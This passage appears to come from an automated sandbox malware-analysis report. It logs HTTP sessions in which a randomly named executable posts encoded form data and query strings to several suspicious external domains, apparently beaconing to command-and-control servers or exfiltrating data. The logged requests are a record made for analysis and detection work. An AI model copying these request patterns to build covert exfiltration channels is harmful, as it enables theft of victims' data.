                                                              Referer: http://www.395608.men/vje0/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 78 36 57 6e 76 33 4b 44 71 72 6b 55 34 4e 52 6d 32 36 35 41 39 65 63 54 76 6b 70 5a 37 62 38 4a 4b 6b 4c 2b 76 6d 43 51 6d 44 75 64 46 68 7a 77 71 4a 73 5a 55 61 6f 33 43 61 34 56 4e 70 31 4f 72 74 6a 49 7a 53 42 61 41 63 56 50 76 34 4b 49 4d 50 34 58 47 63 4b 49 6e 56 66 6a 47 39 72 67 43 6a 36 43 39 46 6d 6d 42 4e 76 43 6e 32 66 46 37 4b 7a 5a 51 37 68 2b 4e 76 49 70 76 2b 75 62 75 2b 78 56 4c 36 6d 6f 77 76 34 6e 41 46 31 58 37 61 6d 48 4b 6e 4f 70 36 74 2b 51 58 5a 72 33 68 48 57 43 4c 7a 64 4c 44 49 61 6c 47 77 69 4a 72 7a 48 64 43 42 56 77 65 61 67 39 75 74 45 42 39 6e 69 62 6f 41 3d 3d
                                                              Data Ascii: jp30l4Dh=CirUhdcxatOzx6Wnv3KDqrkU4NRm265A9ecTvkpZ7b8JKkL+vmCQmDudFhzwqJsZUao3Ca4VNp1OrtjIzSBaAcVPv4KIMP4XGcKInVfjG9rgCj6C9FmmBNvCn2fF7KzZQ7h+NvIpv+ubu+xVL6mowv4nAF1X7amHKnOp6t+QXZr3hHWCLzdLDIalGwiJrzHdCBVweag9utEB9niboA==


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
10          192.168.2.7  49930        207.148.38.19   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:39.053653002 CET  736                OUT        POST /vje0/ HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.395608.men
                                                              Referer: http://www.395608.men/vje0/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 77 61 47 6e 67 77 2b 44 37 37 6b 58 39 4e 52 6d 39 61 35 45 39 65 51 54 76 6d 59 63 34 70 49 4a 4b 42 33 2b 31 6e 43 51 68 44 75 64 4b 42 79 62 33 5a 73 6f 55 61 6b 2f 43 66 51 56 4e 70 78 4f 72 76 37 49 7a 6c 56 5a 42 4d 56 33 6a 59 4b 77 50 2f 34 58 47 63 4b 49 6e 56 4b 2b 47 2b 62 67 65 44 71 43 73 55 6d 6c 4c 74 76 42 67 32 66 46 78 71 79 53 51 37 68 63 4e 74 38 50 76 38 57 62 75 37 64 56 4c 6f 66 61 36 76 35 69 66 56 31 48 2f 37 4c 2b 49 46 47 30 30 4c 6d 47 54 4c 66 4b 74 52 58 67 52 52 52 6e 64 5a 69 65 43 79 47 2f 38 56 61 6f 41 41 52 6f 54 34 55 63 78 61 68 72 77 31 44 66 2b 2b 48 5a 41 32 31 4e 33 68 37 7a 35 4e 74 64 77 47 4d 58 38 36 63 3d
                                                              Data Ascii: jp30l4Dh=CirUhdcxatOzwaGngw+D77kX9NRm9a5E9eQTvmYc4pIJKB3+1nCQhDudKByb3ZsoUak/CfQVNpxOrv7IzlVZBMV3jYKwP/4XGcKInVK+G+bgeDqCsUmlLtvBg2fFxqySQ7hcNt8Pv8Wbu7dVLofa6v5ifV1H/7L+IFG00LmGTLfKtRXgRRRndZieCyG/8VaoAARoT4Ucxahrw1Df++HZA21N3h7z5NtdwGMX86c=


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
11          192.168.2.7  49939        207.148.38.19   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:41.710814953 CET  1749               OUT        POST /vje0/ HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.395608.men
                                                              Referer: http://www.395608.men/vje0/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 43 69 72 55 68 64 63 78 61 74 4f 7a 77 61 47 6e 67 77 2b 44 37 37 6b 58 39 4e 52 6d 39 61 35 45 39 65 51 54 76 6d 59 63 34 70 51 4a 4b 7a 50 2b 32 41 2b 51 67 44 75 64 48 68 79 59 33 5a 73 31 55 61 4d 37 43 66 55 72 4e 72 5a 4f 71 4b 6e 49 37 30 56 5a 4c 4d 56 33 72 34 4b 4c 4d 50 35 54 47 64 6e 42 6e 56 61 2b 47 2b 62 67 65 47 6d 43 38 31 6d 6c 4e 74 76 43 6e 32 66 5a 37 4b 7a 31 51 37 35 6d 4e 75 51 66 75 49 69 62 75 62 4e 56 49 62 6e 61 79 76 35 67 65 56 30 59 2f 37 48 66 49 46 61 53 30 4c 36 6f 54 4c 6e 4b 6f 77 6d 70 4c 7a 35 71 43 70 4b 72 4d 55 54 59 71 6a 65 37 4f 7a 64 56 5a 35 38 48 38 70 56 53 6f 45 44 33 2f 2b 47 63 65 56 70 61 76 6c 4c 78 77 62 6b 7a 6b 33 55 54 39 73 74 57 6e 54 47 44 6c 73 6a 63 74 48 48 35 32 77 6f 38 54 57 56 57 4a 72 56 6f 6e 6e 71 4b 35 72 32 63 62 67 4c 6f 32 49 79 75 76 67 46 62 67 6a 68 77 58 47 46 62 2f 53 62 57 52 4d 47 5a 31 77 4a 34 31 51 43 46 6e 46 41 58 4f 52 64 33 63 65 4e 51 7a 6d 59 39 50 63 71 39 62 54 69 51 62 62 31 79 69 [TRUNCATED]
Data Ascii: jp30l4Dh=[TRUNCATED]


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
12          192.168.2.7  49946        207.148.38.19   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:44.361748934 CET  457                OUT        GET /vje0/?jp30l4Dh=PgD0irRMU+WxztOGjHePrbo3+M5iw7Ze2+IGg2QLz7FMOzLFiXmHtGXqLFzGr5U9fZcqMpJpM7Axvujr/nFFAt85qKucOsoTOMySmy/TDo/wbifdtV6BKdCVmh/j8KvjULR4B+cyoPSP&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.395608.men
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Nov 24, 2024 08:35:46.098805904 CET  664                IN         HTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:35:45 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 479
                                                              Connection: close
                                                              ETag: "651a865d-1df"
                                                              Server: cdn
                                                              X-Cache-Status: MISS
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 09 62 6f 64 79 7b 0a 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 34 34 3b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 0a 09 7d 0a 09 68 33 7b 0a 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 36 30 70 78 3b 0a 09 09 63 6f 6c 6f 72 3a 23 65 65 65 3b 0a 09 09 74 65 78 74 2d 61 6c 69 [TRUNCATED]
                                                              Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
13          192.168.2.7  49962        62.116.130.8    80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:52.174568892 CET  725                OUT        POST /zd1g/ HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.gkfundeis.net
                                                              Referer: http://www.gkfundeis.net/zd1g/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 58 74 62 42 76 62 67 63 4a 62 72 6a 4e 57 6b 6a 64 4c 61 75 2b 48 4b 71 4f 5a 64 42 52 34 53 71 79 4e 61 39 77 4a 57 6e 50 67 34 4e 2f 49 47 54 6e 7a 4e 41 6b 57 53 73 44 63 7a 45 54 78 49 6f 58 33 72 6b 63 43 63 70 33 48 32 38 6f 39 62 65 6b 59 41 31 53 54 52 78 76 50 36 62 77 7a 49 55 49 46 66 65 4f 61 46 47 39 4e 42 69 6f 79 39 35 38 53 76 7a 50 33 61 54 31 2b 58 54 69 6c 4c 73 56 75 74 71 34 54 63 77 74 6d 4b 4a 63 54 6c 58 7a 4e 51 4c 44 48 4f 58 68 35 35 62 2f 67 67 51 32 4e 42 2f 44 46 6c 4b 76 59 54 67 43 6e 4c 69 50 53 44 37 44 77 79 75 38 36 46 43 44 72 58 55 7a 2f 5a 42 41 3d 3d
                                                              Data Ascii: jp30l4Dh=KIF/4Uzdz85BCXtbBvbgcJbrjNWkjdLau+HKqOZdBR4SqyNa9wJWnPg4N/IGTnzNAkWSsDczETxIoX3rkcCcp3H28o9bekYA1STRxvP6bwzIUIFfeOaFG9NBioy958SvzP3aT1+XTilLsVutq4TcwtmKJcTlXzNQLDHOXh55b/ggQ2NB/DFlKvYTgCnLiPSD7Dwyu86FCDrXUz/ZBA==
Nov 24, 2024 08:35:53.481556892 CET  413                IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:35:53 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
14          192.168.2.7  49969        62.116.130.8    80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:55.163640022 CET  745                OUT        POST /zd1g/ HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.gkfundeis.net
                                                              Referer: http://www.gkfundeis.net/zd1g/
                                                              Content-Length: 241
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 33 39 62 53 63 44 67 55 4a 62 6f 2f 39 57 6b 74 39 4c 42 75 2b 4c 4b 71 4b 49 61 47 6b 51 53 72 58 70 61 2b 31 6c 57 6b 50 67 34 47 66 49 66 4e 58 7a 4b 41 6b 61 67 73 47 6b 7a 45 54 31 49 6f 53 7a 72 6b 76 61 66 6f 6e 48 30 69 49 39 5a 51 45 59 41 31 53 54 52 78 76 61 52 62 77 62 49 56 34 31 66 65 73 7a 33 64 64 4e 43 6c 6f 79 39 76 38 53 6a 7a 50 33 30 54 77 6d 39 54 67 64 4c 73 56 65 74 71 74 6e 64 6e 64 6d 4d 45 38 53 61 59 7a 68 66 4d 44 4c 33 57 33 70 61 63 66 34 5a 63 67 4d 6a 6c 68 4a 4a 55 2b 67 6f 6b 41 44 39 31 70 50 32 35 43 30 71 6a 65 4f 6b 64 30 4f 39 5a 68 65 64 58 31 4e 77 77 78 7a 6c 62 56 4f 6a 43 49 6c 53 48 52 49 64 36 66 6b 3d
                                                              Data Ascii: jp30l4Dh=KIF/4Uzdz85BC39bScDgUJbo/9Wkt9LBu+LKqKIaGkQSrXpa+1lWkPg4GfIfNXzKAkagsGkzET1IoSzrkvafonH0iI9ZQEYA1STRxvaRbwbIV41fesz3ddNCloy9v8SjzP30Twm9TgdLsVetqtndndmME8SaYzhfMDL3W3pacf4ZcgMjlhJJU+gokAD91pP25C0qjeOkd0O9ZhedX1NwwxzlbVOjCIlSHRId6fk=
Nov 24, 2024 08:35:56.225536108 CET  413                IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:35:56 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
15          192.168.2.7  49976        62.116.130.8    80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:35:57.820583105 CET  1758               OUT        POST /zd1g/ HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.gkfundeis.net
                                                              Referer: http://www.gkfundeis.net/zd1g/
                                                              Content-Length: 1253
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 4b 49 46 2f 34 55 7a 64 7a 38 35 42 43 33 39 62 53 63 44 67 55 4a 62 6f 2f 39 57 6b 74 39 4c 42 75 2b 4c 4b 71 4b 49 61 47 69 49 53 71 6b 52 61 38 57 39 57 6c 50 67 34 61 76 49 43 4e 58 79 50 41 6b 43 6b 73 47 34 4e 45 52 39 49 70 77 37 72 69 65 61 66 68 6e 48 30 71 6f 39 59 65 6b 5a 43 31 53 43 59 78 76 4b 52 62 77 62 49 56 36 74 66 63 2b 62 33 66 64 4e 42 69 6f 79 68 35 38 54 30 7a 50 76 43 54 77 53 48 55 52 39 4c 73 78 79 74 6d 2f 50 64 6c 39 6d 4f 48 38 53 43 59 7a 73 66 4d 43 6e 56 57 33 31 67 63 59 55 5a 5a 42 39 61 78 42 5a 4f 47 39 77 53 74 41 48 6b 31 2f 6e 38 36 54 6b 37 68 4e 65 2b 62 57 50 63 42 33 36 73 5a 78 46 79 78 41 33 50 61 56 32 6d 54 6f 5a 65 66 78 67 41 67 70 6d 45 51 32 39 47 73 4a 67 67 77 4c 69 47 77 35 59 37 61 71 4f 78 4e 53 61 45 66 73 78 73 34 76 45 58 47 66 79 51 61 66 63 43 69 78 72 33 61 54 52 59 6e 76 54 44 6c 49 71 79 56 2b 32 46 39 49 77 76 6a 4e 70 41 66 6e 47 56 46 47 52 79 59 77 69 77 67 5a 73 59 6a 2b 5a 50 72 69 79 33 33 57 36 50 45 [TRUNCATED]
Data Ascii: jp30l4Dh=[TRUNCATED]
Nov 24, 2024 08:35:59.096466064 CET  413                IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:35:58 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
16          192.168.2.7  49984        62.116.130.8    80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:36:00.485506058 CET  460                OUT        GET /zd1g/?jp30l4Dh=HKtf7if1wssFCwsMZKrQBqjHrNWMjveBtffsr+YOEAp7lFw99HVIkLojFbUmNxvgDUS8qVNfPxg+hDfTlsysjjiIjpBTY2hB1FuC/Ir2XG7/Tel/P9K0Q44ikc2AwKvVyevXJzSbTSZU&Yh8=pl0prhRpj HTTP/1.1
                                                              Host: www.gkfundeis.net
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
Nov 24, 2024 08:36:01.804045916 CET  436                IN         HTTP/1.1 200 OK
                                                              Server: nginx
                                                              Date: Sun, 24 Nov 2024 07:36:01 GMT
                                                              Content-Type: text/html; charset=UTF-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              X-Redirector-ID: b292ff989566f4631a5218f2045923e8f4a6dbc99eba46de6535556e5589b40f
X-Cache-Status: MISS
                                                              Data Raw: 61 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 66 72 61 6d 65 73 65 74 3e 0a 09 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6d 78 2e 6e 65 74 2f 70 72 6f 64 75 6b 74 65 2f 68 6f 6d 65 70 61 67 65 2d 6d 61 69 6c 2f 68 6f 6d 65 70 61 67 65 2d 70 61 72 6b 65 6e 2f 22 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: a1<!DOCTYPE html><html><head><title></title></head><frameset><frame src="http://www.gmx.net/produkte/homepage-mail/homepage-parken/"></frameset></html>0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
17          192.168.2.7  49989        104.21.88.139   80                520  C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 24, 2024 08:36:07.301098108 CET  740                OUT        POST /ryxy/ HTTP/1.1
                                                              Host: www.incgruporxat.click
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-US
                                                              Accept-Encoding: gzip, deflate, br
                                                              Origin: http://www.incgruporxat.click
                                                              Referer: http://www.incgruporxat.click/ryxy/
                                                              Content-Length: 221
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: max-age=0
                                                              User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1036 Safari/532.5
                                                              Data Raw: 6a 70 33 30 6c 34 44 68 3d 30 6c 6e 57 31 64 71 49 4f 55 64 30 2f 32 58 36 7a 4c 7a 62 69 4d 71 4c 71 34 77 4b 44 6e 59 44 2f 66 43 71 69 46 35 6b 5a 63 71 79 57 72 50 51 33 59 79 6a 72 52 52 65 6a 44 48 57 70 77 67 63 48 71 77 6c 4f 64 76 57 56 31 6c 6e 6b 75 52 68 57 56 4b 62 65 6f 45 43 59 74 34 41 61 41 5a 7a 36 58 52 6f 62 53 63 62 77 50 59 48 38 67 41 6e 75 41 63 50 51 72 51 61 48 32 52 37 56 72 6a 38 34 38 72 56 67 36 54 75 68 61 6d 39 38 4b 34 76 31 7a 45 31 79 71 71 59 4d 76 57 30 4b 76 75 4d 5a 72 72 75 39 57 66 53 35 38 78 35 30 49 4a 4b 55 71 44 7a 39 42 46 64 37 50 35 74 4f 38 61 56 7a 4a 34 43 31 65 7a 32 39 45 53 37 4e 41 66 48 59 41 3d 3d
                                                              Data Ascii: jp30l4Dh=0lnW1dqIOUd0/2X6zLzbiMqLq4wKDnYD/fCqiF5kZcqyWrPQ3YyjrRRejDHWpwgcHqwlOdvWV1lnkuRhWVKbeoECYt4AaAZz6XRobScbwPYH8gAnuAcPQrQaH2R7Vrj848rVg6Tuham98K4v1zE1yqqYMvW0KvuMZrru9WfS58x50IJKUqDz9BFd7P5tO8aVzJ4C1ez29ES7NAfHYA==
Nov 24, 2024 08:36:08.551302910 CET  1236               IN         HTTP/1.1 404 Not Found
                                                              Date: Sun, 24 Nov 2024 07:36:08 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                              pragma: no-cache
                                                              x-turbo-charged-by: LiteSpeed
                                                              cf-cache-status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qI%2FFZtvzqyw6tju3SWm6I5iqKM99PTyN1F1rg1QMZKzrQne0S9XGAbMUVGx5GTMcakOrWtxU3fiEmaBooDGemoP5cgF95Rw4yYkTbM%2BL%2By1ClT09gWfTCMQS9CLobxBX%2BR7woSojiWw5"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8e77b9eb5b356a57-EWR
                                                              Content-Encoding: gzip
                                                              alt-svc: h3=":443"; ma=86400
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1688&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=740&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
